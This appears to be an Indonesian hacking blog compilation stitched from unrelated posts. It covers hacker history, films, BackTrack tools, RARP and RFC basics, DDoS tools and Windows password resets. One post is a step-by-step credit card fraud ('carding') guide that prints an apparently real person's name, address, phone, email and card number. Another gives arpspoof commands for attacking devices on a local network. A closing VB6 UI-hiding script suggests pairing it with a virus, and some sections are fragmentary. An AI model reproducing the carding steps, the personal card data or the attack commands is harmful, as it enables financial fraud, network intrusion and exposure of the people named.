Kemudian pada tahun 1983, istilah hacker mulai berkonotasi negatif. Pasalnya, pada tahun tersebut untuk pertama kalinya FBI menangkap kelompok kriminal komputer The 414s yang berbasis di Milwaukee, Amerika Serikat. 414 merupakan kode area lokal mereka. Kelompok yang kemudian disebut hacker tersebut dinyatakan bersalah atas pembobolan 60 buah komputer, dari komputer milik Pusat Kanker Memorial Sloan-Kettering hingga komputer milik Laboratorium Nasional Los Alamos. Satu dari pelaku tersebut mendapatkan kekebalan karena testimonialnya, sedangkan 5 pelaku lainnya mendapatkan hukuman masa percobaan.
Kemudian pada perkembangan selanjutnya muncul kelompok lain yang menyebut-nyebut diri sebagai peretas, padahal bukan. Mereka ini (terutama para pria dewasa) yang mendapat kepuasan lewat membobol komputer dan mengakali telepon (phreaking). Peretas sejati menyebut orang-orang ini cracker dan tidak suka bergaul dengan mereka. Peretas sejati memandang cracker sebagai orang malas, tidak bertanggung jawab, dan tidak terlalu cerdas. Peretas sejati tidak setuju jika dikatakan bahwa dengan menerobos keamanan seseorang telah menjadi peretas.
Para peretas mengadakan pertemuan tahunan, yaitu setiap pertengahan bulan Juli di Las Vegas. Ajang pertemuan peretas terbesar di dunia tersebut dinamakan Def Con. Acara Def Con tersebut lebih kepada ajang pertukaran informasi dan teknologi yang berkaitan dengan aktivitas peretasan.
Peretas memiliki konotasi negatif karena kesalahpahaman masyarakat akan perbedaan istilah tentang hacker dan cracker. Banyak orang memahami bahwa peretaslah yang mengakibatkan kerugian pihak tertentu seperti mengubah tampilan suatu situs web (defacing), menyisipkan kode-kode virus, dan lain-lain, padahal mereka adalah cracker. Cracker-lah menggunakan celah-celah keamanan yang belum diperbaiki oleh pembuat perangkat lunak (bug) untuk menyusup dan merusak suatu sistem. Atas alasan ini biasanya para peretas dipahami dibagi menjadi dua golongan: White Hat Hackers, yakni hacker yang sebenarnya dan cracker yang sering disebut dengan istilah Black Hat Hackers.
[sunting] Hacker dalam film
Pada 1983 keluar pula sebuah film berjudul War Games yang salah satu perannya dimainkan oleh Matthew Broderick sebagai David Lightman. Film tersebut menceritakan seorang remaja penggemar komputer yang secara tidak sengaja terkoneksi dengan super komputer rahasia yang mengontrol persenjataan nuklir AS.
Kemudian pada tahun 1995 keluarlah film berjudul Hackers, yang menceritakan pertarungan antara anak muda jago komputer bawah tanah dengan sebuah perusahaan high-tech dalam menerobos sebuah sistem komputer. Dalam film tersebut digambarkan bagaimana akhirnya anak-anak muda tersebut mampu menembus dan melumpuhkan keamanan sistem komputer perusahaan tersebut. Salah satu pemainnya adalah Angelina Jolie berperan sebagai Kate Libby alias Acid Burn.
Pada tahun yang sama keluar pula film berjudul The Net yang dimainkan oleh Sandra Bullock sebagai Angela Bennet. Film tersebut mengisahkan bagaimana perjuangan seorang pakar komputer wanita yang identitas dan informasi jati dirinya di dunia nyata telah diubah oleh seseorang. Dengan keluarnya dua film tersebut, maka eksistensi terminologi hacker semakin jauh dari yang pertama kali muncul di tahun 1960-an di MIT.
Technorati : HACKER, JARINGAN, KOMPUTER, WEBSITE
Del.icio.us : HACKER, JARINGAN, KOMPUTER, WEBSITE
Zooomr : HACKER, JARINGAN, KOMPUTER, WEBSITE
Flickr : HACKER, JARINGAN, KOMPUTER, WEBSITE
Carding, sebuah ungkapan mengenai aktivitas berbelanja secara maya (lewat komputer), dengan menggunakan, berbagai macam alat pembayaran yang tidak sah. pada umumnya carding identik dengan transaksi kartu kredit, dan pada dasarnya kartu kredit yang digunakan bukan milik si carder tersebut akan tetapi milik orang lain.
apa yang terjadi ketika transaksi carding berlangsung, tentu saja sistem pembayaran setiap toko atau perusahaan yang menyediakan merchant pembayaran mengizinkan adanya transaksi tersebut. seorang carder tinggal menyetujui dengan cara bagaimana pembayaran tersebut di lakukan apakah dengan kartu kredit, wire transfer, phone bil atau lain sebagainya.
cara carding sebagai berikut:
1. mencari kartu kredit yang masih valid, hal ini dilakukan dengan mencuri atau kerjasama dengan orang-orang yang bekerja pada hotel atau toko-toko gede (biasanya kartu kredit orang asing yang disikat). atau masuk ke program MIRC (chatting) pada server dal net, kemudian ke channel #CC, #Carding, #indocarder, #Yogyacarding,dll. nah didalamnya kita dapat melakukan trade (istilah "tukar") antar kartu kredit (bila kita memiliki kartu kredit juga, tapi jika tidak punya kartu kredit, maka dapat melakukan aktivitas "ripper" dengan menipu salah seorang yang memiliki kartu kredit yang masih valid).
2. setelah berhasil mendapatkan kartu kredit, maka carder dapat mencari situs-situs yang menjual produk-produk tertentu (biasanya di cari pada search engine). tentunya dengan mencoba terlebih dahulu (verify) kartu kredit tersebut di site-site porno (hal ini disebabkan karena kartu kredit tersebut tidak hanya dipakai oleh carder tersebut). jika di terima, maka kartu kredit tersebut dapat di belanjakan ke toko-toko tersebut.
3. cara memasukan informasi kartu kredit pada merchant pembayaran toko adalah dengan memasukan nama panggilan (nick name), atau nama palsu dari si carder, dan alamat aslinya. atau dengan mengisi alamat asli dan nama asli si empunya kartu kredit pada form billing dan alamat si carder pada shipping adress. (mudahkan?…..)
jenis kartu kredit:
1. asli didapatkan dari toko atau hotel (biasa disebut virgin CC)
2. hasil trade pada channel carding
3. hasil ekstrapolet (penggandaan, dengan menggunakan program C-master 4, cardpro, cardwizard, dll), softwarenya dapat di Download disini: Cmaster4, dan cchecker (jika ada yang ingin mengetahui CVV dari kartu tersebut)
4. hasil hack (biasa disebut dengan fresh cc), dengan menggunakan tekhnik jebol ASP (dapat anda lihat pada menu "hacking")
Contoh kartu kredit:
First Name* Judy
Last Name* Downer
Address* 2057 Fries Mill Rd
City* Williamstown
State/Province* NJ
Zip* 08094
Phone* ( 856 )881-5692
E-mail* serengeti@erols.com
Payment Method Visa
Card Number 4046446034843451
Exp. Date 5/04
(Tapi kegiatan semacam ini merupakan tindakan kriminalitas)
Technorati : CARDING, CRACKER, CRIME, CVV, HACKING, MONEY
Del.icio.us : CARDING, CRACKER, CRIME, CVV, HACKING, MONEY
Zooomr : CARDING, CRACKER, CRIME, CVV, HACKING, MONEY
Flickr : CARDING, CRACKER, CRIME, CVV, HACKING, MONEY
Punyan Backtrack (what is backtrack)
Backtrack Salah satu distro linux yang merupakan turunan dari slackware yang mana merupakan merger dari whax dan auditor security collection. Backtrack dua dirilis pada tanggal 6 maret 2007 yang memasukkan lebih dari 300 tool security sedangkan versi beta 3 dari backtrack dirilis pada tanggal 14 desember 2007 yang pada rilis ketiga ini lebih difokuskan untuk support hardware. Sedangkan versi backtrack 3 dirilis pada tanggal 19 juni 2008 pada backtrack versi 3 ini memasukkan saint dan maltego sedangkan nessus tidak dimasukkan serta tetap memakai kernel versi 2.6.21.5. pada BackTrack 4 Final sekarang ini menawarkan kernel linux terbaru yaitu kernel 2.6.30.4 .Dilengkapi juga dengan patch untuk wireless driver untuk menanggulangi serangan wireless injection (wireless injection attacks)Sejarah Bactrack
Backtrack dibuat oleh Mati Aharoni yang merupakan konsultan security dari Israel dan max mosser jadi merupakan kolaborasi komunitas, backtrack sendiri merupakan merger dari whax yang mana whax ini adalah salah satu distro linux yang digunakan untuk test keamanan yang asal dari whax sendiri dari knoppix. Ketika knoppix mencapi versi 3.0 maka dinamakan dengan whax. Dengan whax kita bisa melakukan test securtity dari berbagai jaringan dimana saja . Max mosser merupakan auditor security collection yang menghususkan dirinya untuk melakukan penetrasi keamanan di linux, gabungan dari auditor dan whax ini sendiri menghasilakan 300 tool yang digunakan untuk testing security jaringan. Auditor security collection juga terdapat pada knoppix.Fitur Backtrack
Fitur dari backtrack :
Diantara beberapa tool yang terdapat dalam backtrack :
- • Metasploit integration
- • RFMON wireless drivers
- • Kismet
- • AutoScan-Network – AutoScan-Network is a network discovering and managing application
- • Nmap
- • Ettercap
- • Wireshark (formerly known as Ethereal)
- • Enumeration
- • Exploit Archives
- • Scanners
- • Password Attacks
- • Fuzzers
- • Spoofing
- • Sniffers
- • Tunneling
- • Wireless Tools
- • Bluetooth
- • Cisco Tools
- • Database Tools
- • Forensic Tools
- • BackTrack Services
- • Reversing
- • Misc
- Some additional surprises
- A battery of new tools added
- Official FluxBox Support
update backtrack R1
- A New kernel (2.6.34)
- Massively improved hardware support
- Support for new wireless drivers
langkah pertama install paket dsniff :
apt-get install dsniffsetelah semua terinstall, gunakan tool arpspoof, misal kasusnya ip gateway dari si router ntu 192.168.0.1 trus koneksikan pake wireless.
penyerangan dalam satu jaringan, dengan gateway di atas akan mengalami gangguan, bahkan terputus
Ada 2 cara melakukan serangan dengan arpspoof
cara 1:
maksud sintaks di atas
arpspoof -i wlan0 -> interface yang digunakan untuk menyerang adalah wlan0 atau simplenya wireless
arpspoof -i wlan0 192.168.0.1 -> ip address dari gateway atau router
teknik diatas bermasalah, karna serangan di tuju ke gateway, bisa jadi masalah buat diri sendiri
cara 2:
maksud sintaks di atas
arpspoof -i wlano -t ( target ip yang mau diserang) 192.168.0.22 192.168.0.1 (ip gateway)
penggunaan sintaks diatas -t menuju ke ip target secara personal………
Mengenal RARP
RARP( Reverse Address Resolution Protocol )RARP di gunakan oleh komputer yang belum mempunyai no IP pada saat komputer di hidupkan( power on ) maka komputer tersebut melakukan broadcast ke jaringan untuk menanyakan apakah ada server ?...yg dapat memberikan no IP untuk Client
Contoh untuk server yg memberikan no IP adalah DHCP server ( Dynamic Host Confguration Control ) paket broadcast tersebut di kirim beserta dengan Mac Address dari si pengirim.Sever DHCP yang mendengar request tersebut akan menjawabnya dengan memberikan no IP dan waktu pinjam ( Liase Time ) bila liase time sudah habis / komputer di offkan mk no IP tersebut akan di ambil kembali oleh DHCP server dan di berikan kpd komputer lain yang membutuhkannya.
Banyak dari mereka para pemula (newbie) dalam internet yang masih belum mengetahui apa itu RFC. Sebenarnya apa sih RFC itu ? RFC atau Request For Comment dapat dikatakan sebagai cetakan birunya (konsep rancangan) dari jaringan yang telah digunakan di seluruh dunia (ex. protokol HTTP, telnet, ftp dan lainnya).
Kenapa begitu pentingnya ?, karena RFC itu dipakai di seluruh dunia dan telah menjadi standard penggunaan. Contoh yang paling mudah ialah sebuah protokol. Dan contoh dari protokol salah satunya ialah TCP. Sebelum menjurus lebih jauh, penulis akan menjelaskan apa itu protokol.
Protokol merupakan standar komunikasi untuk hubungan antara satu komputer dengan komputer yang lainnya. Tanpa adanya protokol ini maka antara iMAC dan PC tidak bisa berhubungan karena perbedaan arsitektur komputer. Dimanakah letak protokol ini ?, tentu saja pada kernel tersebut. Karena sudah menjadi standard maka antar komputer dengan arsitektur yang bermacam-macam dapat saling berhubungan.
Kita kembali kepada RFC dan bagaimana cara mempelajarinya secara efisien. Terdapat suatu standarisasi dokumen untuk mendefinisikan beberapa kata yang digunakan dalam RFC (lihat RFC 2119).
MUST
Kata ini atau "REQUIRED" atau "SHALL" berarti kebutuhan akan suatu hal dari konsep HARUS ada. Artinya benar-benar harus ada.
MUST NOT
"MUST NOT" atau "SHALL NOT" menunjukkan keharusan juga sesuai dengan arti kata yang ada.
SHOULD
Kata ini memiliki persamaan dengan "RECOMMENDED", yang berarti pada suatu keadaan dapat diabaikan akan tetapi sangat disarankan untuk memahami dan memperhatikannya sebelum menggunakan jalan lain.
SHOULD NOT
Sesuai dengan artinya yakni pada suatu keadaan dapat diabaikan, akan tetapi perlu diperhatikan dengan jelas sebelum mengambil cara lain.
MAY
Kata ini memiliki persamaan dengan "OPTIONAL" yang berarti memang benar-benar optional.
Guidance (Tuntunan)
Pendefinisian, pengertian dan cara-cara serta implementasi yang harus diperhatikan dengan baik.
Security Consider
Hal-hal yang perlu diperhatikan di dalam implementasi terutama yang menyangkut masalah keamanan dari konsep yang akan diterapkan.
Dengan memahami konsep yang di deskripsikan pada RFC yang ada kita dapat membuat suatu aplikasi yang dapat diterapkan sesuai dengan deskripsinya. Contoh yang pernah penulis lakukan ialah memanfaatkan RFC 1459 (Internet Relay Chat Protokol) dimana dengan ini kita dapat membuat sebuah Messenger sederhana.
Kalian dapat mencari RFC yang ada pada internet. Manfaatkanlah Search Engine yang ada (ex. Google). Penulis mendapatkan RFC-RFC yang ada dari teman. Silakan kalian mencarinya.
Jika ada yang masih kurang dan perlu ditambahkan dari keterangan ini silakan ditambahkan.
Happy Hacking guys !
yang bernama Mixter. Aplikasi ini memungkinkan penyerang membuat flood
connection dengan menggunakan protocol yang ada pada TCP/IP yaitu:
berhubungan dengan clear text.
Nama program ini dalam bahasa Jerman yang berarti “Barb Wire”. Sama sepeti TFN software ini menggunakan UDP, TCP, ICMP dalam menciptakan rootshell pada port port yang ada. Menggunakan komunikasi encrypt antar master dan daemon. Memiliki kemampuan mengupdate daemonnya sendiri secara otomatis. Maka dari itu program ini paling effisien dan cukup berbahaya.
Di realease pada tgl 21 Desember 1999. Seperti halnya Stacheldraht program ini meng encrypt tranmision. Berjalan pada platform Windows NT. Tetapi program ini lebih mudah di trace pada daemonnya.
Serangan DDOS ini juga dapat merupakan pengalihan point of view dari si hacker
untuk mendapatkan informasi penting yang ada. Pada dasarnya serangan DOS ini
merupakan rangkaian rencana kerja yang sudah disusun oleh hacker dalam mencapai
tujuannya yang telah ditargetkan[06].
1. Menghapus file SAM
---------------------
Persiapkan CD Instalasi Windows dan bootinglah menggunakan CD tersebut. Masuk ke Windows Recovery Console lalu pergilah ke lokasi berikut:
C:\WINDOWS\SYSTEM32\CONFIG
Hapuslah file SAM yang ada didalamnya. Aksi ini akan mereset semua user yang ada di komputer anda. Aksi ini akan menghapus semua user account di komputer anda, termasuk Administrator sehingga nantinya password Admin akan kosong.
2. Download bd040116.zip dari:
http://home.eunet.no/%7Epnordahl/ntpasswd/bootdisk.html
Utility gratisan yang bisa mengubah semua password OS berbasis NTFS seperti Windows NT, 2000, XP. Utility ini akan membuat bootdisk sendiri.
3. WSINTERNALS ERD COMMANDER
----------------------------
Gunakan WSINTERNALS ERD COMMANDER dari www.wsinternals.com Program itu akan membuat password Admin baru.
MengHiden Tombol Start, Icon Desktop, Systray Icon, Taskbar Clock dan Taskbar dengan VB
- By Hanamicy's
- at 00.37
Okay, Buka Microsoft Visual Basic 6.0 Anda. Pada kotak dialog yang muncul, pilih Standard EXE lalu klik [Open]
Langkah 2.
Buatlah 6 buah Button pada Form anda. Susun seperti gambar berikut:
Atur juga Properties Form-nya:
Langkah 3.
Buatlah sebuah modul baru. Klik menu [Project] kemudian pilih [Add Module]. Akan tampil sebuah kotak dialog. Klik Module, kemudian klik [Open]. Copy-Paste Modul berikut:
Declare Function FindWindow Lib "user32" Alias "FindWindowA" (ByVal lpClassName As String, ByVal lpWindowName As String) As Long
Declare Function FindWindowEx Lib "user32" Alias "FindWindowExA" (ByVal hWnd1 As Long, ByVal hWnd2 As Long, ByVal lpsz1 As String, ByVal lpsz2 As String) As Long
Public Declare Function ShowWindow Lib "user32" (ByVal hwnd As Long, ByVal nCmdShow As Long) As Long
Public Function HideStartButton()
Dim Handle As Long, FindClass As Long
FindClass& = FindWindow("Shell_TrayWnd", "")
Handle& = FindWindowEx(FindClass&, 0, "Button", vbNullString)
ShowWindow Handle&, 0
End Function
Public Function ShowStartButton()
Dim Handle As Long, FindClass As Long
FindClass& = FindWindow("Shell_TrayWnd", "")
Handle& = FindWindowEx(FindClass&, 0, "Button", vbNullString)
ShowWindow Handle&, 1
End Function
Public Function HideDesktop()
ShowWindow FindWindowEx(FindWindowEx(FindWindow("Progman", vbNullString), 0&, "SHELLDLL_DefView", vbNullString), 0&, "SysListView32", vbNullString), 0
End Function
Public Function ShowDesktop()
ShowWindow FindWindowEx(FindWindowEx(FindWindow("Progman", vbNullString), 0&, "SHELLDLL_DefView", vbNullString), 0&, "SysListView32", vbNullString), 5
End Function
Public Function HideTaskBarClock()
Dim FindClass As Long, FindParent As Long, Handle As Long
FindClass& = FindWindow("Shell_TrayWnd", vbNullString)
FindParent& = FindWindowEx(FindClass&, 0, "TrayNotifyWnd", vbNullString)
Handle& = FindWindowEx(FindParent&, 0, "TrayClockWClass", vbNullString)
ShowWindow Handle&, 0
End Function
Public Function ShowTaskBarClock()
Dim FindClass As Long, FindParent As Long, Handle As Long
FindClass& = FindWindow("Shell_TrayWnd", vbNullString)
FindParent& = FindWindowEx(FindClass&, 0, "TrayNotifyWnd", vbNullString)
Handle& = FindWindowEx(FindParent&, 0, "TrayClockWClass", vbNullString)
ShowWindow Handle&, 1
End Function
Public Function HideTaskBarIcons()
Dim FindClass As Long, Handle As Long
FindClass& = FindWindow("Shell_TrayWnd", "")
Handle& = FindWindowEx(FindClass&, 0, "TrayNotifyWnd", vbNullString)
ShowWindow Handle&, 0
End Function
Public Function ShowTaskBarIcons()
Dim FindClass As Long, Handle As Long
FindClass& = FindWindow("Shell_TrayWnd", "")
Handle& = FindWindowEx(FindClass&, 0, "TrayNotifyWnd", vbNullString)
ShowWindow Handle&, 1
End Function
Public Function HideTaskBar()
Dim Handle As Long
Handle& = FindWindow("Shell_TrayWnd", vbNullString)
ShowWindow Handle&, 0
End Function
Public Function ShowTaskBar()
Dim Handle As Long
Handle& = FindWindow("Shell_TrayWnd", vbNullString)
ShowWindow Handle&, 1
End Function
Langkah 4.
Klik Form anda. Kemudian klik menu [View] lalu pilih [Code]. Copy-Paste Code berikut:
Private Sub Form_Load()
Command1.Caption = "Sembunyikan Tombol Start"
Command2.Caption = "Sembunyikan Icon Desktop"
Command3.Caption = "Sembunyikan Taskbar Clock"
Command4.Caption = "Sembunyikan Icon Systray"
Command5.Caption = "Sembunyikan Taskbar"
Command6.Caption = "Tampilkan Semua!!"
End Sub
Private Sub Command1_Click()
HideStartButton
End Sub
Private Sub Command2_Click()
HideDesktop
End Sub
Private Sub Command3_Click()
HideTaskBarClock
End Sub
Private Sub Command4_Click()
HideTaskBarIcons
End Sub
Private Sub Command5_Click()
HideTaskBar
End Sub
Private Sub Command6_Click()
ShowStartButton
ShowDesktop
ShowTaskBarClock
ShowTaskBarIcons
ShowTaskBar
End Sub
Langkah 5.
Simpan hasil pekerjaan anda. Klik File --> Save Project. Kini jalankan Program anda, tekan tombol [F5] pada keyboard anda. Kurang lebih hasilnya demikian:
Selamat mencoba.. bisa dipadukan dengan Virus buatan anda atau.. hehehe.. terserah anda laah.. ;)











